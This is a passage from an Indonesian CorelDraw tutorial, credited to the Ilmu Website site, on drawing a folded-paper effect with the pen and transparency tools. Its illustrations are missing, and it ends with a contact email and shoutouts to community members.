Klik kanan objek yang berwarna 70% black tersebut, pilih extract
content, kemudian delete. Dengan transparency tool, buat si objek yang
berwarna 70% black tersebut menjadi seperti ini.





Kemudian kita akan membuat lipatan kecil kertas tersebut, pertama buat garis Bantu terlebih dahulu …





Dengan pen tool





Buat objek seperti ini …





Kemudian beri warna putih, dengan transparency tool, lakukan transparency pada objek tersebut sehingga hasilnya seperti ini ..





Dengan pen tool





Buat objek seperti ini …





Kemudian beri warna hitam …





Dengan transparency tool buat objek hitam tersebut menjadi seperti ini …





Untuk selanjutnya konsepnya sama saja, buat objek baru, kemudian
berikan kesan gelap terang, sehingga hasil akhirnya akan menjadi
seperti ini …





Hmmm, cukup sekian untuk tutorial membuat kertasnya. Kalo ada yang ditanyakan silahkan kirim email ke alkemail@gmail.com
File Tutorial Corel Draw tersebut dapat di download disini.


Shoutz to :

b_scorpio [ maaf atas kelalaiannya :D ] tetap pada jalan tuk menguasai
dunia. :D~ , jojo, abu_zahra, safril, phii_, ivan, fadli, dr.emi,
ilmuwebsite community. 




Sumber dari situs Ilmu Website dalam kategori coreldraw dengan judul Teknik Gambar Bentuk Lipatan Kertas